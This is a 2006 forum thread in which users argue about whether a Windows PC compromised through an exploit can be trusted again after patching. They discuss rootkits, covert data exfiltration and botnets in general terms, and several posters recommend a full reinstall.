> no sensitive information.
Stupid. What about resources?
> It goes online for only very brief periods,
> and during that time I know it's not transmitting rogue packets.
You should refrain from claiming that you know something that can't be
known ever.
| |
| erewhon 2006-11-05, 1:16 pm |
| It is possible to insert a piece of malicious code, subsequent to gaining
access via the initial exploit code, and that such code can hidden by a
rootkit, and can sit as a hidden process or as a time activated piece of
code, and wait till an internet connection is available to stream out cached
keystroke logs or any other local data via http to a remote server.
It would be virtually undetectable without running process mons, rootkit
mons, file mons, network mons 24x7 and ananylsing every single file touch,
reg touch and byte sent. Even then... it may check for the presence of such
tools and not acivate or send data when present.
The bottom line is this.
The machine had this vulnerabilty SINCE THE DAY YOU BUILT IT.
Exploit code was used to compromise this machine.
You have no idea how many times (above the single detected instance) this
vulnerable machine has been compromised using this, or any other
vulnerability both current known, or yet to be announced.
All code changes made since the machine was built are not known, since you
have not been monitoring every single byte of code change, and even then,
the code changes may have been hidden from such tools.
QED - a machine hosting vulnerable code, once compromised, remains
compromised even after the vulnerability is closed, and the known exploit
code removed.
I re-iterate:
1. Format
2. Rebuild the os
3. Patch to the latest
4. Ensure firewall policies lock access
This is the only way to clean such an exploit infection. Even this will not
prevent the next 0day exploit.
Do you have any idea how much exploitable code Microsoft have released
patches for since the initial release of their o/s. Think about it. This
exploitable code has been in existance, on every single machine with this
build, since day one.
The fact that someone has announced it to M$, and M$ release a patch, means
only that the hole is now closed. That window of opportunity for exploit has
exisited SINCE DAY ONE to the latest 'patch tuesday'.
Do you have any idea how long hackers are using malicious code to exploit
vulnerable M$ code, roaming undetected before such a hole becomes noticed or
announced, and then a fix is put in place? Thats YEARS of opportuntiy to
exploit such holes.
Your assertion that you 'know your machine' and are emphatic about its
current trustworthy state is both naive, untenable and illogical given the
above.
| |
|
| "Sebastian Gottschalk" wrote:
> Ant wrote:
>
> Now you've lost the last sound of professionality.
Funny, that. I enter this thread to explain some Javascript, and you
accuse me of not being professional. Where did I say that computer
security was my profession?
>
> Bullshit. It's unsafe at any rate.
Bullshit to you as well. I have no problems.
>
> Stupid. What about resources?
What about them?
>
> You should refrain from claiming that you know something that can't be
> known ever.
You should refrain from trolling.
| |
| Sebastian Gottschalk 2006-11-05, 7:22 pm |
| erewhon wrote:
> It is possible to insert a piece of malicious code, subsequent to gaining
> access via the initial exploit code, and that such code can hidden by a
> rootkit, and can sit as a hidden process or as a time activated piece of
> code, and wait till an internet connection is available to stream out cached
> keystroke logs or any other local data via http to a remote server.
>
> It would be virtually undetectable without running process mons, rootkit
> mons, file mons, network mons 24x7 and ananylsing every single file touch,
> reg touch and byte sent.
Even then it could be undetectable, since it could shove the entire system
into a virtual instance. Or, depending on the focus of the kernel function
monitoring, a sufficiently deep kernel modification is already enough.
Monitoring network traffic won't help. You can easily relay data with
almost any host, including legitimate ones like Google, Yahoo, MSN,
nytimes.com, whitehouse.gov, ...
> Even then... it may check for the presence of such tools and not acivate
> or send data when present.
Not to mention tunneling like f.e. with slight variations in TCP ISNs.
> Do you have any idea how long hackers are using malicious code to exploit
> vulnerable M$ code, roaming undetected before such a hole becomes noticed or
> announced, and then a fix is put in place? Thats YEARS of opportuntiy to
> exploit such holes.
At least for MSIE, the situation is way worse: Holes are found, become
noticed or announced, get exploited for years, and Microsoft still won't
put a fix in place.
> Your assertion that you 'know your machine' and are emphatic about its
> current trustworthy state is both naive, untenable and illogical given the
> above.
And especially without any evidence.
| |
| Sebastian Gottschalk 2006-11-05, 7:22 pm |
| Ant wrote:
> "Sebastian Gottschalk" wrote:
>
>
> Funny, that. I enter this thread to explain some Javascript, and you
> accuse me of not being professional. Where did I say that computer
> security was my profession?
Well, so now it's safe to call you an amateur who has obviously no clue
what he's talking about and making nonsensical claims.
> Bullshit to you as well. I have no problems.
You being unable to notice your problems doesn't mean that they don't
exist.
>
> What about them?
This is something valuable, to the malicious guys of course. And that's why
you're an interesting target.
And it's definitely your problem, because you'll be held responsible for
your computer being abused to attack other ones.
>
> You should refrain from trolling.
Wise men stick to their own advise as well. Nuff said.
| |
| Benjamin Flesch 2006-11-05, 7:22 pm |
| Sebastian Gottschalk wrote:
>
> This is something valuable, to the malicious guys of course. And that's
> why you're an interesting target.
>
> And it's definitely your problem, because you'll be held responsible for
> your computer being abused to attack other ones.
He means often Windows Desktop Computers belonging to normal Users @ Home
who just want to use their Computer for surfing the Web (often via MSIE
thats the sad truth) and doing some mails and stuff like that, dont even
care about having Bots, Trojans and other Malware on their machine unless
it disturbs them.
And that is why there are so large botnets which use the resources of some
"small" home computer with your 1 or 2 mbit connection.
but if you replace "some" by "thousands" you'll end up with a capacity high
above some GBits which are commonly used to f.ex. DDOS homepages (learn
more at wikipedia en.wikipedia.org/wiki/DDOS)
I hope I was able to show you that your way if dealin' with the
"trojan-thing" is pretty wrong and harms loads of people out there.
cheers benjamin
| |
|
| "erewhon" wrote:
> Do you have any idea how much exploitable code Microsoft have released
> patches for since the initial release of their o/s. Think about it. This
> exploitable code has been in existance, on every single machine with this
> build, since day one.
>
> The fact that someone has announced it to M$, and M$ release a patch, means
> only that the hole is now closed. That window of opportunity for exploit has
> exisited SINCE DAY ONE to the latest 'patch tuesday'.
In which case all Windows installations should be rebuilt every time a
patch is released, because there is no knowing what might have sneaked
in before. The same goes for any other operating system.
> Your assertion that you 'know your machine' and are emphatic about its
> current trustworthy state is both naive, untenable and illogical given the
> above.
Given that I've monitored my system with a variety of tools and
techniques since day one, and kept my eye on the latest exploit
developments, I'll trust my own judgement rather than be swayed by
someone else's paranoia.
| |
|
| "Sebastian Gottschalk" wrote:
> Ant wrote:
>
> Well, so now it's safe to call you an amateur who has obviously no clue
> what he's talking about and making nonsensical claims.
So it was nonsensical to compare the system binaries against known
clean ones?
>
> You being unable to notice your problems doesn't mean that they don't
> exist.
You telling me I have problems doesn't mean I have them.
>
> This is something valuable, to the malicious guys of course. And that's why
> you're an interesting target.
On a slow dialup that connects for brief periods in the evening and
weekends? I don't think so.
> And it's definitely your problem, because you'll be held responsible for
> your computer being abused to attack other ones.
It would be a problem if that were the case, and I would have heard
about it by now.
>
> Wise men stick to their own advise as well. Nuff said.
I agree. This discussion is going nowhere.
| |
| erewhon 2006-11-05, 7:22 pm |
| > I'll trust my own judgement rather than be swayed by
> someone else's paranoia.
Then your judgement and logic are flawed.
Paranoia is justified if the evidence supports the fact they are actually
out to get you.
| |
| erewhon 2006-11-05, 7:22 pm |
|
> On a slow dialup that connects for brief periods in the evening and
> weekends? I don't think so.
It was always long enough for bo2k to send out a notify email, and then to
allow the client to take full control.
If you think 56k is a bottleneck to exploit, then you are more stupid than
you currently appear.
| |
| Sebastian Gottschalk 2006-11-05, 7:22 pm |
| Ant wrote:
>
> In which case all Windows installations should be rebuilt every time a
> patch is released,
No, only if you were remotely vulnerable.
> because there is no knowing what might have sneaked in before.
There is. Checksums!
> The same goes for any other operating system.
Indeed.
>
> Given that I've monitored my system with a variety of tools and
> techniques since day one, and kept my eye on the latest exploit
> developments, I'll trust my own judgement rather than be swayed by
> someone else's paranoia.
Obviously your judgement is very flawed.
| |
| Sebastian Gottschalk 2006-11-05, 7:22 pm |
| Ant wrote:
> "Sebastian Gottschalk" wrote:
>
>
> So it was nonsensical to compare the system binaries against known
> clean ones?
It was nonsensical to claim that this wouldn't be necessary for the Windows
registry. Almost everything there is suitable for automatically invoking
the launch of executable code, therefore a simple look at it won't do so -
however, a restore from a safe backup and carefully analyzing the
difference to the recent content is.
And you just claimed to compare core binaries. Now what it some application
loads a specific library not belonging to the core components? Or what
about critical system data files like sysmain.sdb? You have to do a full
comparison, whether you like it or not.
>
> You telling me I have problems doesn't mean I have them.
Ignorance is bliss, hein?
>
> On a slow dialup that connects for brief periods in the evening and
> weekends? I don't think so.
Is enough to transfer some data which require heavy processing, and
transfer back the results.
>
> It would be a problem if that were the case, and I would have heard
> about it by now.
Well, and then it's too late.
| |
|
|
| Sebastian Gottschalk 2006-11-06, 7:27 pm |
| erewhon wrote:
>
> Apart from using a more secure o/s
>
> http://www.theregister.co.uk/2006/1...ay_windows_bug/
This does not prevent, just limit the effect of errors.
Beside that, it's not a bug of Windows, but a bug in an ActiveX control.
Exploiting requires visiting a malicious website with IE, which is already
equivalent to granting a remote shell.
Even further, MSXML 4.0 isn't even a component of Windows XP by default and
has to be installed by other applications.
|
|
|
|
|